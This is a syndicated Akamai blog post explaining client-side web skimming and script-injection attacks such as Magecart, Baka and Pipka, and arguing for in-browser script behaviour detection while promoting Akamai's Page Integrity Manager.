SBN

Client-Side Protection is Key to Web Application Security

The Open Web Application Security Project (OWASP) Foundation defines script attacks as a “type of injection in which malicious scripts are injected into otherwise benign and trusted websites.”1 From the perspective of the user, malicious code is coming from trusted websites. Recently popularized by Magecart hacker groups, script attacks have focused on the web skimming of cookies, tokens, and — most commonly — personally identifiable information (PII) such as payment information, medical records, and other types of sensitive information.

An attacker sends a malicious script to an unsuspecting user, most often on the client side, in the browser. Because the user thinks the script came from a trusted source, the end user’s browser has no way to know that the script should not be trusted and will execute the script.

New web skimming attack methodologies, such as Baka and Pipka,2 are wreaking havoc on websites across the globe. Popular third-party scripts, such as Google Analytics, are exponentially (if unknowingly) spreading new web skimming attack vectors. So far in 2020, the cost of breaches that included PII has been 30% higher than the cost of average data breaches. Specifically, the most expensive breaches per record are PII thefts, at around $150 per breached record globally and $175 per record in the United States.3 

Current popular conventions to prevent script attacks have relied on threat intelligence and web application firewalls (WAFs) to filter, monitor, and block HTTP traffic to and from a web application using policy controls. While threat intelligence and WAFs are critical parts to any server-side internet security portfolio, they are not enough to protect against recently developed advanced attack methodologies on the client side.

Script attacks are a big deal. Let’s explore why protecting scripts against in-browser attacks requires a different approach.

  1. Browsers have created an increasingly large, hard-to-see attack surface
    Script usage has increased dramatically in the past few years. And of particular interest is that scripts built by third parties (not the website owner) have also increased. In fact, in a study done by Akamai in early 2020, third-party requests averaged 67% of all requests across all Akamai customers.4 Because third-party scripts aren’t easily visible or controllable by website owners, this makes it particularly hard to use threat intelligence and policies to block malicious activity.
  2. Trusted domains are often the most common source of attacks
    As mentioned in the OWASP definition above, trusted domains are often used as an attack vector for scripts. This problem is just as surprising to the trusted partner as it is to the website owner. Techniques used to compromise a trusted partner include the hijacking of existing scripts, exploiting common vulnerabilities, taking advantage of misconfigurations, adding malicious code to open source projects, and hijacking DNS. Since policies typically use allowlists and blocklists to authorize the use of a domain, blocking a trusted domain can have huge side effects on limiting business.
  3. Little attention is spent on controlling script vulnerabilities
    Common Vulnerabilities and Exposures (CVE) can create gaps in security programs that act as gateways into websites and associated browsers that can lead to script attacks if left untreated. Recent studies have estimated that more than 80% of web pages contain at least one known third-party library security CVE.5
  4. Highly dynamic script usages makes timely updates hard
    Scripts are used for many important web page activities providing application functions, as well as business and website analytics. They are constantly being added and removed. In a 2020 study, Akamai analyzed more than 100,000 JavaScript resources over a 90-day period. In the final week, only 25% of the scripts were still in use. That’s a 75% turnover within one quarter. Additionally, scripts that persisted throughout the quarter went through very frequent changes.

The dynamic nature of attacks coupled with the dynamic portfolio of scripts creates many zero-day events not captured in threat intelligence and therefore not captured in policies to block bad activity.

What this all means is that relying solely on threat intelligence and the resulting policies is often overly time-consuming, causing a delay in stopping attacks, and in many cases not able to effectively monitor abuses in the first place.

What is in-browser script behavior detection?

The purpose of adding malicious web skimming code to script executions is to cause a script to do something it was not intended to do. This could include sending sensitive information to a bad actor’s destination or sending access to different or additional information and then exfiltrating that data to a bad actor destination. When this happens, script activities change. That change in script behavior is the final word in malicious script impact.  

If the focus of web skimming problems is in-browser script behaviors, what does a security solution look like that deals effectively with this problem?

What are the attributes of effective behavior detection systems?

In-browser script behavior detection

Most web application security solutions today focus on policy enforcement of inbound internet traffic to web servers. 

But these new script attacks focus on scripts executing in web browsers. So data monitoring, collection, and mitigation must be focused on traffic to and from the web browser. Web browser attacks are also called client-side attacks because they happen on the user, or client, side of the internet.

ClientSideProtectionBlog1, 11.3.png

Comprehensive, real-time, real user data collection 

Malicious code can be injected into any script event at any time. Some code like Pipka and Baka can even self-delete.

Critical script activity to be collected and analyzed:

  • Execution events
  • Network activity
  • Domain Object Model events
  • JavaScript object property
  • Element attributes
  • Cookies and storage access
  • Enrichment data

This data must also be collected for all script types including first-party, third-party, and other supply chain scripts. This is particularly important because third-party script use is dramatically increasing. Getting visibility into all of these scripts isn’t easy. Supply-chain scripts, such as third-party scripts, do not flow through web servers. They interact at the browser level only and are therefore obscured from traditional web server protection methods.

At the same time, web skimming solutions target pages with sensitive information. So an effective web skimming security solution must be PCI compliant.

Data to not be collected:

  • Personally identifiable information (PII)
  • Inner HTML (strings/texts)
  • EU GDPR data
  • Payment data

Vulnerability detection

While detecting suspicious and malicious script behaviors is the most important way to stop web skimming attacks, script vulnerabilities represent weaknesses in protecting customer PII and corporate data. Because effective web skimming protection systems are seeing all script activity in the browser, it is an effective place to constantly compare a frequently updated CVE database against the constantly changing set of scripts in use by a web page. Details from a CVE database not only determine which resource is potentially a problem, but why. Rather than just blocking traffic from a source, code tuning or a license upgrade may resolve the issue and allow for the continued use of a valuable partner.

Risk-scored information in real time

Website security teams get a lot of information every day that needs to be analyzed. Script execution information is no different. Many sites generate millions of script actions a day. A valuable web skimming security solution must be able to filter and prioritize information so that security teams can deal with the situations that might cause data exfiltration. A good way to do this is to provide risk scores that indicate the severity of the change in script behavior. Risk scores would rise when a new pattern of change is present, sensitive data is requested, or sources of the script and/or data destinations change. Higher risk scores would generate alerts and provide enough detailed information to make meaningful mitigations. All of this needs to happen as soon as the analysis is indicated.  

Need for easy mitigation and policy creation

While known CVEs need policies to block threats, detected suspicious behavior requires analysis. Security teams are always balancing allowing traffic through to maintain the business while blocking activity that harms the business. This can be a heavy resource burden to keep up. Good web skimming solutions need to make mitigation quick and easy with enough detailed information to build a specific policy to allow good business to go on. Insights from risk-scored alerts need to be easily used to create and modify policies with specific granularity so that only the malicious activity is blocked. This means that some activity from a trusted source is blocked and some is allowed through.

Flexible deployment options

Of course, in-browser web skimming attacks are not the only attacks that can have a significant impact on websites. But because the focus is on the web browser rather than web servers, it is really a distinct challenge. With that said, a solution still needs to work in concert with other security products and platforms to build a complete security web application defense. This means that a good web skimming solution must be independent of technologies like WAFs, bot management, and API gateways, and be able to support all hosting platforms, CDNs, and cloud solutions.

Akamai has embraced and invested in bringing to market a web skimming protection product called Page Integrity Manager, which focuses on the script execution behavior with unprecedented visibility into the runtime environment. It collects information about the different scripts that run in the web page, each action they take, and their relation to other scripts in the page. Pairing this data with our multilayered detection approach — leveraging heuristics, risk scoring, AI, and other factors — allows Page Integrity Manager to detect different types of client-side attacks, with a high focus on data exfiltration and web skimming attacks.

 

Sources:

https://owasp.org/www-community/attacks/xss/

https://www.securityweek.com/visa-issues-alert-baka-javascript-skimmer, 2020

https://www.darkreading.com/attacks-breaches/average-cost-of-a-data-breach-$386-million/d/d-id/1338489, 2020

4 HTTP Archive data for sites on the Akamai Intelligent Edge Platform, 2020

5 https://httparchive.org/reports/state-of-the-web#pctVuln, 2020 


*** This is a Security Bloggers Network syndicated blog from The Akamai Blog authored by Mike Kane. Read the original post at: http://feedproxy.google.com/~r/TheAkamaiBlog/~3/7ekP_WP9tr4/client-side-protection-is-key-to-web-application-security.html